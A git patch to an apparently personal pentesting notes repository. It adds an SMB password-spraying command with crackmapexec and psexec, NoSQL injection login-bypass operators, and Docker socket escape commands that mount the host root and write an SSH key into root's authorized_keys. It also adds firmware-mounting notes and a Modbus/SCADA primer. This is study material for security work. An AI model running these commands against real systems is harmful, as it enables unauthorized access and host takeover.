From 7b33c61fecff702ce7192bf7de9ec6ec6ec9ce7d Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 4 Nov 2021 17:19:58 +0100 Subject: [PATCH] bump --- .gitmodules | 3 ++ crackmapexec.md | 10 ++++++ enumeration/enumeration | 1 - enumeration/priv_esc/deepce | 1 + exploit/sqli/no_sqli.md | 15 +++++++++ misc/level3_hypervisor/docker_sec/docker.md | 29 +++++++++++++++++ reverse_engineering/docs/firmware.md | 24 ++++++++++++++ reverse_engineering/docs/scada.md | 35 +++++++++++++++++++++ 8 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 crackmapexec.md delete mode 160000 enumeration/enumeration create mode 160000 enumeration/priv_esc/deepce create mode 100644 exploit/sqli/no_sqli.md create mode 100644 reverse_engineering/docs/scada.md diff --git a/.gitmodules b/.gitmodules index 117f855..ec1ad3f 100644 --- a/.gitmodules +++ b/.gitmodules @@ -52,3 +52,6 @@ [submodule "exploit/windows/CVE-2021-1675"] path = exploit/windows/CVE-2021-1675 url = https://github.com/calebstewart/CVE-2021-1675 +[submodule "enumeration/priv_esc/deepce"] + path = enumeration/priv_esc/deepce + url = https://github.com/stealthcopter/deepce.git diff --git a/crackmapexec.md b/crackmapexec.md new file mode 100644 index 0000000..61dbf67 --- /dev/null +++ b/crackmapexec.md @@ -0,0 +1,10 @@ +# Crackmapexec + +* Dictionary attack against SMB +```sh +cme smb domain.name -u s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt +``` + * Use the password with `impacket/examples/psexec.py` in the following way + ```sh + psexec.py domain.name/:@ + ``` diff --git a/enumeration/enumeration b/enumeration/enumeration deleted file mode 160000 index 3c0e726..0000000 --- a/enumeration/enumeration +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d diff --git a/enumeration/priv_esc/deepce b/enumeration/priv_esc/deepce new file mode 160000 index 0000000..229fad0 --- /dev/null +++ b/enumeration/priv_esc/deepce @@ -0,0 +1 @@ +Subproject commit 229fad09eee712ede052525d4d3df29410bc0199 diff --git a/exploit/sqli/no_sqli.md b/exploit/sqli/no_sqli.md new file mode 100644 index 0000000..26b369f --- /dev/null +++ b/exploit/sqli/no_sqli.md @@ -0,0 +1,15 @@ +# NoSQL Injections + +* No tables, but files (collections) +* Examples are Elasticsearch, MongoDB, Redis, CouchDB. + +## Querying +* Filter instead of SQL queries +* [Redis docs](https://redis.io/documentation) +* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) +* [Elasticsearch docs](https://www.elastic.co/guide/index.html) + +## Tips & Tricks + +* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar` + * 2D array via `user[$nin][]=foo` diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md index a8cd0af..80f3408 100644 --- a/misc/level3_hypervisor/docker_sec/docker.md +++ b/misc/level3_hypervisor/docker_sec/docker.md @@ -96,6 +96,35 @@ echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit chmod a+x /exploit sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` +## Check fdisk + +* `fdisk -l` and `lsblk`, host bulk device may be exposed +* Mount the device +```sh +mkdir /mnt/hostdev +mount /dev/ /mnt/hostdev +``` + +## Creating a Container from inside another container + +* Needs root inside a container +* Upload [static curl](https://github.com/moparisthebest/static-curl) +* Check available images and containers +```sh +curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json +curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json +``` +* Inside the container as root +```sh +curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":":latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo >> /var/tmp/root/.ssh/authorized_keys"]}' +``` +* Return value is the ID +* Start a container +```sh +curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers//start +``` +* Login in to the host via ssh + ## Dirty c0w https://github.com/dirtycow/dirtycow.github.io diff --git a/reverse_engineering/docs/firmware.md b/reverse_engineering/docs/firmware.md index fc7f12c..faaee1d 100644 --- a/reverse_engineering/docs/firmware.md +++ b/reverse_engineering/docs/firmware.md @@ -9,3 +9,27 @@ ```sh ./fat.py ``` +* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git` + +## Usage +* Check image via `strings` +* Check CRC via `cksum -a crc ` +* Use `binwalk` to extract. There are to methods + * `-e` extract by offset + * `--dd=".*"` by file extension + +### Mount JFFS2 File +* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10` +```sh +rm -rf /dev/mtdblock0 +mknod /dev/mtdblock0 b 31 0 +mkdir /mnt/jffs2 +modprobe jffs2 +modprobe mtdram +modprobe mtdblock +dd if= of=/dev/mtdblock0 +mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/ +``` + +## Tips & Tricks +* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php) diff --git a/reverse_engineering/docs/scada.md b/reverse_engineering/docs/scada.md new file mode 100644 index 0000000..b36c598 --- /dev/null +++ b/reverse_engineering/docs/scada.md @@ -0,0 +1,35 @@ +# Supervisory Control and Data Acquisition (SCADA) + +* SCADA works as an aggregatio of the following systems + * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices. + * __Remote Terminal Unit (RTU)__, use for wide area telemetry + * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input. + * __Communication network__ + +* Security is no first class citizen + +## Modbus + +* Developed by Modicon +* Master/Slave, latter has an 8 bit address. +* RS-485 Connector +* Data registers 16 bit + * Input register, 16 bit ro + * Hold register, rw + * Coil register, 1 bit rw + * Discrete register, 1bit ro + +### Function Codes +* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html) +* RTU request inside of TCP segments, port 502 + +* 1 __Read Coil__ +* 2 __Read Discrete Input__ +* 3 __Read Holding Registers__ +* 4 __Read Input Registers__ +* 5 __Write Single Coil__ +* 6 __Write Single Holding Register__ +* 15 __Write Multiple Coils__ +* 16 __Write Multiple Holding Registers__ + +